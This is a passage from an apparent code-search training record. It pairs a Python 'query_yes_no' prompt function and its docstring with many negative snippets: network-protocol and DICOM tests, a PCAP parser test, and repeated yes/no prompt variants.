self.connected.addCallback(strip(login))\n d1.addCallback(strip(examine))\n d1.addErrback(self._ebGeneral)\n d2 = self.loopback()\n d = defer.gatherResults([d1, d2])\n return d.addCallback(self._cbTestExamine)", "def test_message_rx(self):\n\n self.maxDiff = 1000\n session_id = self._open_session()\n\n # Send a data message in our new session\n sent_data_message = {\n \"fqdn\": self.CLIENT_NAME,\n \"type\": \"DATA\",\n \"plugin\": \"test_messaging\",\n \"session_id\": session_id,\n \"session_seq\": 0,\n \"body\": None,\n }\n response = self._post([sent_data_message])\n self.assertResponseOk(response)\n\n forwarded_data_message = self._receive_one_amqp()\n\n self.assertDictEqual(sent_data_message, forwarded_data_message)", "def test_rsp_success(self):\n\n def handle(event):\n return 0x0000, event.action_information\n\n self.ae = ae = AE()\n ae.acse_timeout = 5\n ae.dimse_timeout = 5\n ae.network_timeout = 5\n ae.add_supported_context(ProceduralEventLogging)\n scp = ae.start_server(\n (\"localhost\", 11112), block=False, evt_handlers=[(evt.EVT_N_ACTION, handle)]\n )\n\n ae.add_requested_context(ProceduralEventLogging)\n assoc = ae.associate(\"localhost\", 11112)\n assert assoc.is_established\n\n ds = Dataset()\n ds.PatientName = \"Test^test\"\n status, ds = assoc.send_n_action(\n ds, 1, ProceduralEventLogging, \"1.2.840.10008.5.1.1.40.1\"\n )\n assert status.Status == 0x0000\n assert ds.PatientName == \"Test^test\"\n assoc.release()\n assert assoc.is_released\n\n scp.shutdown()", "def _handler_command_test(self, *args, **kwargs):\n next_state = None\n result = None\n\n next_state = SBE37ProtocolState.TEST\n \n return (next_state, result)", "def test_construct_with_node():\n control_data = get_control_data('node')\n payload = messages.construct_payload('This is the subject line', node={\"id\": \"my-board\"})\n assert payload == control_data\n return", "def test_message_tx(self):\n session_id = self._open_session()\n\n sent_fresh_message = {\n \"fqdn\": self.CLIENT_NAME,\n \"type\": \"DATA\",\n \"plugin\": \"test_messaging\",\n \"session_id\": session_id,\n \"session_seq\": 0,\n \"body\": None,\n }\n self._send_one_amqp(sent_fresh_message)\n\n response = self._get()\n self.assertResponseOk(response)\n forwarded_messages = response.json()[\"messages\"]\n self.assertEqual(len(forwarded_messages), 1)\n self.assertEqual(forwarded_messages[0], sent_fresh_message)", "def testParse(self):\n parser = pcap.PcapParser()\n storage_writer = self._ParseFile(['test.pcap'], parser)\n\n # PCAP information:\n # Number of streams: 96 (TCP: 47, UDP: 39, ICMP: 0, Other: 10)\n #\n # For each stream 2 events are generated one for the start\n # and one for the end time.\n\n self.assertEqual(storage_writer.number_of_events, 192)\n\n events = list(storage_writer.GetEvents())\n\n # Test stream 3 (event 6).\n # Protocol: TCP\n # Source IP: 192.168.195.130\n # Dest IP: 63.245.217.43\n # Source Port: 1038\n # Dest Port: 443\n # Stream Type: SSL\n # Starting Packet: 4\n # Ending Packet: 6\n\n event = events[6]\n self.assertEqual(event.packet_count, 3)\n self.assertEqual(event.protocol, 'TCP')\n self.assertEqual(event.source_ip, '192.168.195.130')\n self.assertEqual(event.dest_ip, '63.245.217.43')\n self.assertEqual(event.dest_port, 443)\n self.assertEqual(event.source_port, 1038)\n self.assertEqual(event.stream_type, 'SSL')\n self.assertEqual(event.first_packet_id, 4)\n self.assertEqual(event.last_packet_id, 6)\n\n # Test stream 6 (event 12).\n # Protocol: UDP\n # Source IP: 192.168.195.130\n # Dest IP: 192.168.195.2\n # Source Port: 55679\n # Dest Port: 53\n # Stream Type: DNS\n # Starting Packet: 4\n # Ending Packet: 6\n # Protocol Data: DNS Query for wpad.localdomain\n\n event = events[12]\n self.assertEqual(event.packet_count, 5)\n self.assertEqual(event.protocol, 'UDP')\n self.assertEqual(event.source_ip, '192.168.195.130')\n self.assertEqual(event.dest_ip, '192.168.195.2')\n self.assertEqual(event.dest_port, 53)\n self.assertEqual(event.source_port, 55679)\n self.assertEqual(event.stream_type, 'DNS')\n self.assertEqual(event.first_packet_id, 11)\n self.assertEqual(event.last_packet_id, 1307)\n self.assertEqual(\n event.protocol_data, 'DNS Query for wpad.localdomain')\n\n expected_message = (\n 'Source IP: 192.168.195.130 '\n 'Destination IP: 192.168.195.2 '\n 'Source Port: 55679 '\n 'Destination Port: 53 '\n 'Protocol: UDP '\n 'Type: DNS '\n 'Size: 380 '\n 'Protocol Data: DNS Query for wpad.localdomain '\n 'Stream Data: \\'\\\\xb8\\\\x9c\\\\x01\\\\x00\\\\x00\\\\x01\\\\x00\\\\x00\\\\x00\\\\x00'\n '\\\\x00\\\\x00\\\\x04wpad\\\\x0blocaldomain\\\\x00\\\\x00\\\\x01\\\\x00\\\\x01\\\\xb8'\n '\\\\x9c\\\\x01\\\\x00\\\\x00\\\\x01\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x04wpa\\' '\n 'First Packet ID: 11 '\n 'Last Packet ID: 1307 '\n 'Packet Count: 5')\n expected_short_message = (\n 'Type: DNS '\n 'First Packet ID: 11')\n\n self._TestGetMessageStrings(event, expected_message, expected_short_message)", "def test_run_and_logs(self, registered_model):\n create_standard_model = functools.partial(\n registered_model.create_standard_model,\n code_dependencies=[],\n environment=Python([]),\n )\n echo_model_ver = create_standard_model(Echo)\n double_model_ver = create_standard_model(Double)\n triple_model_ver = create_standard_model(Triple)\n sum_model_ver = create_standard_model(Sum)\n\n pipeline_defn = {\n \"steps\": [\n {\"name\": \"echo\", \"model_version_id\": echo_model_ver.id},\n {\"name\": \"double\", \"model_version_id\": double_model_ver.id},\n {\"name\": \"triple\", \"model_version_id\": triple_model_ver.id},\n {\"name\": \"sum\", \"model_version_id\": sum_model_ver.id},\n ],\n \"graph\": [\n {\"name\": \"double\", \"predecessors\": [\"echo\"]},\n {\"name\": \"triple\", \"predecessors\": [\"echo\"]},\n {\"name\": \"sum\", \"predecessors\": [\"double\", \"triple\"]},\n ],\n }\n orchestrator = LocalOrchestrator(registered_model._conn, pipeline_defn)\n\n input = 3\n with runtime.context() as ctx:\n output = orchestrator.run(3)\n assert ctx.logs() == {\n \"echo\": f\"echoing {input}\",\n \"double\": f\"doubling {input}\",\n \"triple\": f\"tripling {input}\",\n \"sum\": f\"summing {input * 2} and {input * 3}\",\n }\n assert output == input * 2 + input * 3\n assert orchestrator._outputs == {\n \"echo\": input,\n \"double\": input * 2,\n \"triple\": input * 3,\n \"sum\": output,\n }", "def run():\n args = parse_args()\n auth_string = get_auth_string(args.auth)\n case_id = new_case_id()\n\n # Read patient's age and sex; required by /diagnosis endpoint.\n # Alternatively, this could be done after learning patient's complaints\n age, sex = conversation.read_age_sex()\n print(f\"Ok, {age} year old {sex}.\")\n age = {'value': age, 'unit': 'year'}\n\n # Query for all observation names and store them. In a real chatbot, this\n # could be done once at initialisation and used for handling all events by\n # one worker. This is an id2name mapping.\n naming = apiaccess.get_observation_names(age, auth_string, case_id, args.model)\n\n # Read patient's complaints by using /parse endpoint.\n mentions = conversation.read_complaints(age, sex, auth_string, case_id, args.model)\n\n # Keep asking diagnostic questions until stop condition is met (all of this\n # by calling /diagnosis endpoint) and get the diagnostic ranking and triage\n # (the latter from /triage endpoint).\n evidence = apiaccess.mentions_to_evidence(mentions)\n evidence, diagnoses, triage = conversation.conduct_interview(evidence, age,\n sex, case_id,\n auth_string,\n args.model)\n\n # Add `name` field to each piece of evidence to get a human-readable\n # summary.\n apiaccess.name_evidence(evidence, naming)\n\n # Print out all that we've learnt about the case and finish.\n print()\n conversation.summarise_all_evidence(evidence)\n conversation.summarise_diagnoses(diagnoses)\n '''conversation.summarise_triage(triage)'''", "def test_decode_failure(self):\n\n def handle(event):\n ds = Dataset()\n ds.PatientName = \"Test^test\"\n return 0x0000, ds\n\n self.ae = ae = AE()\n ae.acse_timeout = 5\n ae.dimse_timeout = 5\n ae.network_timeout = 5\n ae.add_supported_context(DisplaySystem)\n scp = ae.start_server(\n (\"localhost\", 11112), block=False, evt_handlers=[(evt.EVT_N_GET, handle)]\n )\n\n ae.add_requested_context(DisplaySystem)\n assoc = ae.associate(\"localhost\", 11112)\n assert assoc.is_established\n\n class DummyReply:\n def getvalue(self):\n def test():\n pass\n\n return test\n\n class DummyMessage:\n is_valid_response = True\n AttributeList = DummyReply()\n Status = 0x0000\n STATUS_OPTIONAL_KEYWORDS = []\n\n class DummyDIMSE:\n msg_queue = queue.Queue()\n gotten = False\n\n def send_msg(*args, **kwargs):\n return\n\n def get_msg(self, *args, **kwargs):\n if not self.gotten:\n self.gotten = True\n return 1, DummyMessage()\n return None, None\n\n assoc._reactor_checkpoint.clear()\n while not assoc._is_paused:\n time.sleep(0.01)\n assoc.dimse = DummyDIMSE()\n assert assoc.is_established\n status, ds = assoc.send_n_get(\n [(0x7FE0, 0x0010)], DisplaySystem, \"1.2.840.10008.5.1.1.40.1\"\n )\n\n assert status.Status == 0x0110\n assert ds is None\n\n scp.shutdown()", "def _handler_test_run_tests(self, *args, **kwargs):\n next_state = None\n result = None\n\n tc_pass = False\n tt_pass = False\n tp_pass = False\n tc_result = None\n tt_result = None\n tp_result = None\n\n test_result = {}\n\n try:\n tc_pass, tc_result = self._do_cmd_resp('tc', timeout=200)\n tt_pass, tt_result = self._do_cmd_resp('tt', timeout=200)\n tp_pass, tp_result = self._do_cmd_resp('tp', timeout=200)\n \n except Exception as e:\n test_result['exception'] = e\n test_result['message'] = 'Error running instrument tests.'\n \n finally:\n test_result['cond_test'] = 'Passed' if tc_pass else 'Failed'\n test_result['cond_data'] = tc_result\n test_result['temp_test'] = 'Passed' if tt_pass else 'Failed'\n test_result['temp_data'] = tt_result\n test_result['pres_test'] = 'Passed' if tp_pass else 'Failed'\n test_result['pres_data'] = tp_result\n test_result['success'] = 'Passed' if (tc_pass and tt_pass and tp_pass) else 'Failed'\n \n self._driver_event(DriverAsyncEvent.TEST_RESULT, test_result)\n next_state = SBE37ProtocolState.COMMAND\n \n return (next_state, result)", "def test_sendTableWithName(self):\n client = AMP()\n\n class SampleCommand(Command):\n arguments = [(\"id\", Integer())]\n\n class Receiver(AMP):\n @SampleCommand.responder\n def gotIt(self, id):\n self.it = id\n return {}\n\n server = Receiver()\n clientT = StringTransport()\n serverT = StringTransport()\n client.makeConnection(clientT)\n server.makeConnection(serverT)\n client.callRemote(SampleCommand, id=123)\n server.dataReceived(clientT.io.getvalue())\n self.assertEqual(server.it, 123)", "def test_fast_forward_scenario1 (self) :\n\t\tnodeList = self.createNodes(3)\n\n\t\t# Adding a record to a node A\n\t\tnodeList[0].addAppData(\"record1\",\"A version 1\", Node.ALL, Node.ALL)\n\t\tnodeList[0].serialize((Node.ALL, Node.ALL))\n\t\t\n\t\t# Node A pushing data to Node B\n\t\tsess0_1 = nodeList[0].createSyncSession(nodeList[1], nodeList[1].instanceID)\n\t\tnodeList[0].pushInitiation(sess0_1, (Node.ALL, Node.ALL))\n\t\tself.assertEqual(nodeList[1].store[\"record1\"].lastSavedByInstance, nodeList[0].instanceID)\n\t\tself.assertEqual(nodeList[1].store[\"record1\"].lastSavedByCounter, 1)\n\t\tself.assertEqual(nodeList[1].store[\"record1\"].lastSavedByHistory, {nodeList[0].instanceID:1})\n\t\tself.assertEqual(nodeList[1].store[\"record1\"].partitionFacility, Node.ALL)\n\t\tself.assertEqual(nodeList[1].store[\"record1\"].partitionUser, Node.ALL)\n\t\tself.assertEqual(nodeList[1].store[\"record1\"].recordData, \"A version 1\")\n\n\t\tappRecord = nodeList[1].searchRecordInApp(\"record1\")\t\n\t\tself.assertEqual(appRecord.recordData, \"A version 1\")\n\t\tself.assertEqual(appRecord.dirtyBit, 0)\n\t\tself.assertEqual(appRecord.partitionFacility, Node.ALL)\n\t\tself.assertEqual(appRecord.partitionUser, Node.ALL)\n\n\t\t# Node B now modifies this data\n\t\tnodeList[1].addAppData(\"record1\",\"B version 1\", Node.ALL, Node.ALL)\n\t\tself.assertEqual(appRecord.recordData, \"B version 1\")\n\t\tself.assertEqual(appRecord.dirtyBit, 1)\n\n\t\tnodeList[1].serialize((Node.ALL, Node.ALL))\n\t\tself.assertEqual(appRecord.dirtyBit, 0)\n\t\tself.assertEqual(nodeList[1].store[\"record1\"].lastSavedByInstance, nodeList[1].instanceID)\n\t\tself.assertEqual(nodeList[1].store[\"record1\"].lastSavedByCounter, 1)\n\t\tself.assertEqual(nodeList[1].store[\"record1\"].lastSavedByHistory, {nodeList[0].instanceID:1,\\\n\t\t\t nodeList[1].instanceID:1})\n\t\tself.assertEqual(nodeList[1].store[\"record1\"].partitionFacility, Node.ALL)\n\t\tself.assertEqual(nodeList[1].store[\"record1\"].partitionUser, Node.ALL)\n\t\tself.assertEqual(nodeList[1].store[\"record1\"].recordData, \"B version 1\")\n\n\t\t# Node B pushing data to Node C\n\t\tsess1_2 = nodeList[1].createSyncSession(nodeList[2], nodeList[2].instanceID)\n\t\tnodeList[1].pushInitiation(sess1_2, (Node.ALL, Node.ALL))\n\t\tself.assertEqual(nodeList[2].store[\"record1\"].lastSavedByInstance, nodeList[1].instanceID)\n\t\tself.assertEqual(nodeList[2].store[\"record1\"].lastSavedByCounter, 1)\n\t\tself.assertEqual(nodeList[2].store[\"record1\"].lastSavedByHistory, {nodeList[0].instanceID:1, \\\n\t\t\tnodeList[1].instanceID:1})\n\t\tself.assertEqual(nodeList[2].store[\"record1\"].partitionFacility, Node.ALL)\n\t\tself.assertEqual(nodeList[2].store[\"record1\"].partitionUser, Node.ALL)\n\t\tself.assertEqual(nodeList[2].store[\"record1\"].recordData, \"B version 1\")\n\n\t\t# Node A pushing data to Node C\n\t\tsess0_2 = nodeList[0].createSyncSession(nodeList[2], nodeList[2].instanceID)\n\t\tnodeList[0].pushInitiation(sess0_2, (Node.ALL, Node.ALL))\n\t\tself.assertEqual(nodeList[2].store[\"record1\"].lastSavedByInstance, nodeList[1].instanceID)\n\t\tself.assertEqual(nodeList[2].store[\"record1\"].lastSavedByCounter, 1)\n\t\tself.assertEqual(nodeList[2].store[\"record1\"].lastSavedByHistory, {nodeList[0].instanceID:1, \\\n\t\t\tnodeList[1].instanceID:1})\n\t\tself.assertEqual(nodeList[2].store[\"record1\"].partitionFacility, Node.ALL)\n\t\tself.assertEqual(nodeList[2].store[\"record1\"].partitionUser, Node.ALL)\n\t\tself.assertEqual(nodeList[2].store[\"record1\"].recordData, \"B version 1\")", "def test_rsp_bad_dataset(self):\n\n def handle(event):\n return 0x0000, event.action_information\n\n self.ae = ae = AE()\n ae.acse_timeout = 5\n ae.dimse_timeout = 5\n ae.network_timeout = 5\n ae.add_supported_context(PrintJob)\n scp = ae.start_server(\n (\"localhost\", 11112), block=False, evt_handlers=[(evt.EVT_N_ACTION, handle)]\n )\n\n ae.add_requested_context(PrintJob)\n assoc = ae.associate(\"localhost\", 11112)\n assert assoc.is_established\n\n class DummyReply:\n def getvalue(self):\n def test():\n pass\n\n return test\n\n class DummyMessage:\n is_valid_response = True\n is_valid_request = False\n msg_type = None\n ActionReply = DummyReply()\n Status = 0x0000\n STATUS_OPTIONAL_KEYWORDS = []\n\n class DummyDIMSE:\n msg_queue = queue.Queue()\n\n def send_msg(*args, **kwargs):\n return\n\n def get_msg(*args, **kwargs):\n rsp = DummyMessage()\n return 1, rsp\n\n assoc._reactor_checkpoint.clear()\n while not assoc._is_paused:\n time.sleep(0.01)\n assoc.dimse = DummyDIMSE()\n ds = Dataset()\n ds.PatientName = \"Test^test\"\n status, ds = assoc.send_n_action(ds, 1, PrintJob, \"1.2.840.10008.5.1.1.40.1\")\n\n assert status.Status == 0x0110\n assert ds is None\n\n scp.shutdown()" ]
[ "0.5372232", "0.5337886", "0.5229061", "0.51248443", "0.5084246", "0.5082173", "0.5059913", "0.50520146", "0.5048308", "0.50415814", "0.5012191", "0.5003331", "0.49835372", "0.49795404", "0.49769887", "0.49708155", "0.49585548", "0.49475357", "0.49267948", "0.48812303", "0.48809856", "0.48587957", "0.48386958", "0.48309466", "0.4823552", "0.47841203", "0.4783123", "0.4774407", "0.47600457", "0.475357" ]
0.5756279
0
Ask a yes/no question via raw_input() and return their answer. "question" is a string that is presented to the user. "default" is the presumed answer if the user just hits . It must be "yes" (the default), "no" or None (meaning an answer is required of the user). The force option simply sets the answer to default. The "answer" return value is one of "yes" or "no".
def query_yes_no(question, default="yes", force=False): valid = {"yes":True, "y":True, "ye":True, "no":False, "n":False} if default == None: prompt = " [y/n] " elif default == "yes": prompt = " [Y/n] " elif default == "no": prompt = " [y/N] " else: raise ValueError("invalid default answer: '%s'" % default) while True: sys.stdout.write(question + prompt) if not force: choice = raw_input().lower() else: choice = "yes" if default is not None and choice == '': return valid[default] elif choice in valid: return valid[choice] else: sys.stdout.write("Please respond with 'yes' or 'no' "\ "(or 'y' or 'n').\n")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def query_yes_no(question, default=\"yes\"):\n valid = {\"yes\":\"yes\", \"y\":\"yes\", \"ye\":\"yes\",\n \"no\":\"no\", \"n\":\"no\"}\n if default == None:\n prompt = \" [y/n] \"\n elif default == \"yes\":\n prompt = \" [Y/n] \"\n elif default == \"no\":\n prompt = \" [y/N] \"\n else:\n raise ValueError(\"invalid default answer: '%s'\" % default)\n while 1:\n sys.stdout.write(question + prompt)\n if sys.version_info[0]==2:\n choice = raw_input().lower()\n elif sys.version_info[0]>2:\n choice = input().lower()\n if default is not None and choice == '':\n return default\n elif choice in valid:\n return valid[choice]\n else:\n sys.stdout.write(\"Please respond with 'yes' or 'no' \"\\\n \"(or 'y' or 'n').\\n\")", "def query_yes_no(question, default=\"yes\"):\n valid = {\"yes\":\"yes\", \"y\":\"yes\", \"ye\":\"yes\",\n \"no\":\"no\", \"n\":\"no\"}\n if default == None:\n prompt = \" [y/n] \"\n elif default == \"yes\":\n prompt = \" [Y/n] \"\n elif default == \"no\":\n prompt = \" [y/N] \"\n else:\n raise ValueError(\"invalid default answer: '%s'\" % default)\n\n while 1:\n sys.stdout.write(question + prompt)\n choice = raw_input().lower()\n if default is not None and choice == '':\n return default\n elif choice in valid.keys():\n return valid[choice]\n else:\n sys.stdout.write(\"Please respond with 'yes' or 'no' \"\\\n \"(or 'y' or 'n').\\n\")", "def query_yes_no(question, default=\"no\"):\n valid = {\"yes\": True, \"y\": True, \"ye\": True,\n \"no\": False, \"n\": False}\n if default is None:\n prompt = \" [y/n] \"\n elif default == \"yes\":\n prompt = \" [Y/n] \"\n elif default == \"no\":\n prompt = \" [y/N] \"\n else:\n raise ValueError(\"invalid default answer: '%s'\" % default)\n\n while True:\n sys.stdout.write(question + prompt)\n choice = raw_input().lower()\n if default is not None and choice == '':\n return valid[default]\n elif choice in valid:\n return valid[choice]\n else:\n sys.stdout.write(\"Please respond with 'yes' or 'no' \"\n \"(or 'y' or 'n').\\n\")", "def query_yes_no(self,question, default=\"yes\"):\n valid = {\"yes\":\"yes\", \"y\":\"yes\", \"ye\":\"yes\", \"no\":\"no\", \"n\":\"no\"}\n\n if default == None:\n prompt = \" [y/n] \"\n elif default == \"yes\":\n prompt = \" [Y/n] \"\n elif default == \"no\":\n prompt = \" [y/N] \"\n else:\n raise ValueError(\"invalid default answer: '%s'\" % default)\n\n while 1:\n sys.stdout.write(question + prompt)\n choice = raw_input().lower()\n if default is not None and choice == '':\n return default\n elif choice in valid.keys():\n return valid[choice]\n else:\n sys.stdout.write(\"Please respond with 'yes' or 'no' (or 'y' or 'n').\\n\")", "def query_yes_no(question, default=\"yes\"):\r\n valid = {\"yes\": True, \"y\": True, \"ye\": True,\r\n \"no\": False, \"n\": False}\r\n if default is None:\r\n prompt = \" [y/n] \"\r\n elif default == \"yes\":\r\n prompt = \" [Y/n] \"\r\n elif default == \"no\":\r\n prompt = \" [y/N] \"\r\n else:\r\n raise ValueError(\"invalid default answer: '%s'\" % default)\r\n\r\n while True:\r\n sys.stdout.write(question + prompt)\r\n choice = raw_input().lower()\r\n if default is not None and choice == '':\r\n return valid[default]\r\n elif choice in valid:\r\n return valid[choice]\r\n else:\r\n sys.stdout.write(\"Please respond with 'yes' or 'no' \"\r\n \"(or 'y' or 'n').\\n\")", "def query_yes_no(question, default=\"yes\"):\r\n valid = {\"yes\": True, \"y\": True, \"ye\": True,\r\n \"no\": False, \"n\": False}\r\n\r\n if default is None:\r\n prompt = \" [y/n] \"\r\n elif default == \"yes\":\r\n prompt = \" [Y/n] \"\r\n elif default == \"no\":\r\n prompt = \" [y/N] \"\r\n else:\r\n raise ValueError(\"invalid default answer: '%s'\" % default)\r\n\r\n while True:\r\n sys.stdout.write(question + prompt)\r\n choice = raw_input().lower()\r\n if default is not None and choice == '':\r\n return valid[default]\r\n elif choice in valid:\r\n return valid[choice]\r\n else:\r\n sys.stdout.write(\"Please respond with 'yes' or 'no' (or 'y' or 'n').\\n\")", "def query_yes_no(question, default=\"yes\"):\n valid = {\"yes\":True, \"y\":True, \"ye\":True,\n \"no\":False, \"n\":False}\n if default == None:\n prompt = \" [y/n] \"\n elif default == \"yes\":\n prompt = \" [Y/n] \"\n elif default == \"no\":\n prompt = \" [y/N] \"\n else:\n raise ValueError( _(\"invalid default answer:\") + \" '%s'\" % default)\n\n while True:\n sys.stdout.write(question + prompt)\n choice = raw_input().lower()\n if default is not None and choice == '':\n return valid[default]\n elif choice in valid:\n return valid[choice]\n else:\n sys.stdout.write( _(\"Please respond with 'yes' or 'no' \") + \"(or 'y' or 'n').\\n\")", "def query_yes_no(question, default=\"yes\"):\r\n valid = {\"yes\":True, \"y\":True, \"ye\":True,\r\n \"no\":False, \"n\":False}\r\n if default == None:\r\n prompt = \" [y/n] \"\r\n elif default == \"yes\":\r\n prompt = \" [Y/n] \"\r\n elif default == \"no\":\r\n prompt = \" [y/N] \"\r\n else:\r\n raise ValueError(\"invalid default answer: '%s'\" % default)\r\n\r\n while True:\r\n sys.stdout.write(question + prompt)\r\n choice = raw_input().lower()\r\n if default is not None and choice == '':\r\n return valid[default]\r\n elif choice in valid:\r\n return valid[choice]\r\n else:\r\n sys.stdout.write(\"Please respond with 'yes' or 'no' \"\\\r\n \"(or 'y' or 'n').\\n\")", "def query_yes_no(question, default=\"yes\"):\r\n valid = {\"yes\":True, \"y\":True, \"ye\":True,\r\n \"no\":False, \"n\":False}\r\n if default == None:\r\n prompt = \" [y/n] \"\r\n elif default == \"yes\":\r\n prompt = \" [Y/n] \"\r\n elif default == \"no\":\r\n prompt = \" [y/N] \"\r\n else:\r\n raise ValueError(\"invalid default answer: '%s'\" % default)\r\n\r\n while True:\r\n sys.stdout.write(question + prompt)\r\n choice = raw_input().lower()\r\n if default is not None and choice == '':\r\n return valid[default]\r\n elif choice in valid:\r\n return valid[choice]\r\n else:\r\n sys.stdout.write(\"Please respond with 'yes' or 'no' \"\\\r\n \"(or 'y' or 'n').\\n\")", "def query_yes_no(question, default=\"yes\"):\n valid = { \"yes\": True, \"y\": True, \"ye\": True,\n \"no\": False, \"n\": False }\n if default is None:\n prompt = \" [y/n] \"\n elif default == \"yes\":\n prompt = \" [Y/n] \"\n elif default == \"no\":\n prompt = \" [y/N] \"\n else:\n raise ValueError(\"invalid default answer: '%s'\" % default)\n\n while True:\n sys.stdout.write(question + prompt)\n choice = raw_input().lower()\n if default is not None and choice == '':\n return valid[default]\n elif choice in valid:\n return valid[choice]\n else:\n sys.stdout.write(\"Please respond with 'yes' or 'no' \"\n \"(or 'y' or 'n').\\n\")", "def query_yes_no(question, default=\"yes\"):\n valid = {\"yes\":True, \"y\":True, \"ye\":True,\n \"no\":False, \"n\":False}\n if default == None:\n prompt = \" [y/n] \"\n elif default == \"yes\":\n prompt = \" [Y/n] \"\n elif default == \"no\":\n prompt = \" [y/N] \"\n else:\n raise ValueError(\"invalid default answer: '%s'\" % default)\n\n while True:\n sys.stdout.write(question + prompt)\n choice = raw_input().lower()\n if default is not None and choice == '':\n return valid[default]\n elif choice in valid:\n return valid[choice]\n else:\n sys.stdout.write(\"Please respond with 'yes' or 'no' \"\\\n \"(or 'y' or 'n').\\n\")", "def query_yes_no(question, default=\"yes\"):\n valid = {\"yes\":True, \"y\":True, \"ye\":True,\n \"no\":False, \"n\":False}\n if default == None:\n prompt = \" [y/n] \"\n elif default == \"yes\":\n prompt = \" [Y/n] \"\n elif default == \"no\":\n prompt = \" [y/N] \"\n else:\n raise ValueError(\"invalid default answer: '%s'\" % default)\n\n while True:\n sys.stdout.write(question + prompt)\n choice = raw_input().lower()\n if default is not None and choice == '':\n return valid[default]\n elif choice in valid:\n return valid[choice]\n else:\n sys.stdout.write(\"Please respond with 'yes' or 'no' \"\\\n \"(or 'y' or 'n').\\n\")", "def query_yes_no(question, default=\"yes\"):\n valid = {\"yes\":True, \"y\":True, \"ye\":True,\n \"no\":False, \"n\":False}\n if default == None:\n prompt = \" [y/n] \"\n elif default == \"yes\":\n prompt = \" [Y/n] \"\n elif default == \"no\":\n prompt = \" [y/N] \"\n else:\n raise ValueError(\"invalid default answer: '%s'\" % default)\n\n while True:\n sys.stdout.write(question + prompt)\n choice = raw_input().lower()\n if default is not None and choice == '':\n return valid[default]\n elif choice in valid:\n return valid[choice]\n else:\n sys.stdout.write(\"Please respond with 'yes' or 'no' \"\\\n \"(or 'y' or 'n').\\n\")", "def query_yes_no(question, default=\"yes\"):\n valid = {\"yes\":True, \"y\":True, \"ye\":True,\n \"no\":False, \"n\":False}\n if default == None:\n prompt = \" [y/n] \"\n elif default == \"yes\":\n prompt = \" [Y/n] \"\n elif default == \"no\":\n prompt = \" [y/N] \"\n else:\n raise ValueError(\"invalid default answer: '%s'\" % default)\n\n while True:\n sys.stdout.write(question + prompt)\n choice = raw_input().lower()\n if default is not None and choice == '':\n return valid[default]\n elif choice in valid:\n return valid[choice]\n else:\n sys.stdout.write(\"Please respond with 'yes' or 'no' \"\\\n \"(or 'y' or 'n').\\n\")", "def query_yes_no(question, default=\"yes\"):\n valid = {\"yes\":True, \"y\":True, \"ye\":True,\n \"no\":False, \"n\":False}\n if default == None:\n prompt = \" [y/n] \"\n elif default == \"yes\":\n prompt = \" [Y/n] \"\n elif default == \"no\":\n prompt = \" [y/N] \"\n else:\n raise ValueError(\"invalid default answer: '%s'\" % default)\n\n while True:\n sys.stdout.write(question + prompt)\n choice = raw_input().lower()\n if default is not None and choice == '':\n return valid[default]\n elif choice in valid:\n return valid[choice]\n else:\n sys.stdout.write(\"Please respond with 'yes' or 'no' \"\\\n \"(or 'y' or 'n').\\n\")", "def query_yes_no(question, default=\"yes\"):\n valid = {\"yes\": True, \"y\": True, \"ye\": True,\n \"no\": False, \"n\": False}\n if default is None:\n prompt = \" [y/n] \"\n elif default == \"yes\":\n prompt = \" [Y/n] \"\n elif default == \"no\":\n prompt = \" [y/N] \"\n else:\n raise ValueError(\"invalid default answer: '%s'\" % default)\n\n while True:\n sys.stdout.write(question + prompt)\n choice = raw_input().lower()\n if default is not None and choice == '':\n return valid[default]\n elif choice in valid:\n return valid[choice]\n else:\n sys.stdout.write(\"Please respond with 'yes' or 'no' \"\n \"(or 'y' or 'n').\\n\")", "def query_yes_no(question, default=\"yes\"):\n valid = {\"yes\": True, \"y\": True, \"ye\": True,\n \"no\": False, \"n\": False}\n if default is None:\n prompt = \" [y/n] \"\n elif default == \"yes\":\n prompt = \" [Y/n] \"\n elif default == \"no\":\n prompt = \" [y/N] \"\n else:\n raise ValueError(\"invalid default answer: '%s'\" % default)\n\n while True:\n sys.stdout.write(question + prompt)\n choice = raw_input().lower()\n if default is not None and choice == '':\n return valid[default]\n elif choice in valid:\n return valid[choice]\n else:\n sys.stdout.write(\"Please respond with 'yes' or 'no' \"\n \"(or 'y' or 'n').\\n\")", "def query_yes_no(question, default=\"yes\"):\n valid = {\"yes\": True, \"y\": True, \"ye\": True,\n \"no\": False, \"n\": False}\n if default is None:\n prompt = \" [y/n] \"\n elif default == \"yes\":\n prompt = \" [Y/n] \"\n elif default == \"no\":\n prompt = \" [y/N] \"\n else:\n raise ValueError(\"invalid default answer: '%s'\" % default)\n\n while True:\n sys.stdout.write(question + prompt)\n choice = raw_input().lower()\n if default is not None and choice == '':\n return valid[default]\n elif choice in valid:\n return valid[choice]\n else:\n sys.stdout.write(\"Please respond with 'yes' or 'no' \"\n \"(or 'y' or 'n').\\n\")", "def query_yes_no(question, default=\"yes\"):\n valid = {\"yes\": True, \"y\": True, \"ye\": True,\n \"no\": False, \"n\": False}\n if default is None:\n prompt = \" [y/n] \"\n elif default == \"yes\":\n prompt = \" [Y/n] \"\n elif default == \"no\":\n prompt = \" [y/N] \"\n else:\n raise ValueError(\"invalid default answer: '%s'\" % default)\n\n while True:\n sys.stdout.write(question + prompt)\n choice = raw_input().lower()\n if default is not None and choice == '':\n return valid[default]\n elif choice in valid:\n return valid[choice]\n else:\n sys.stdout.write(\"Please respond with 'yes' or 'no' \"\n \"(or 'y' or 'n').\\n\")", "def query_yes_no(question, default=\"yes\"):\n valid = {\"yes\": True, \"y\": True, \"ye\": True,\n \"no\": False, \"n\": False}\n if default is None:\n prompt = \" [y/n] \"\n elif default == \"yes\":\n prompt = \" [Y/n] \"\n elif default == \"no\":\n prompt = \" [y/N] \"\n else:\n raise ValueError(\"invalid default answer: '%s'\" % default)\n\n while True:\n sys.stdout.write(question + prompt)\n choice = raw_input().lower()\n if default is not None and choice == '':\n return valid[default]\n elif choice in valid:\n return valid[choice]\n else:\n sys.stdout.write(\"Please respond with 'yes' or 'no' \"\n \"(or 'y' or 'n').\\n\")", "def query_yes_no(question, default=\"yes\"):\n valid = {\"yes\": True, \"y\": True, \"ye\": True,\n \"no\": False, \"n\": False}\n if default is None:\n prompt = \" [y/n] \"\n elif default == \"yes\":\n prompt = \" [Y/n] \"\n elif default == \"no\":\n prompt = \" [y/N] \"\n else:\n raise ValueError(\"invalid default answer: '%s'\" % default)\n\n while True:\n sys.stdout.write(question + prompt)\n choice 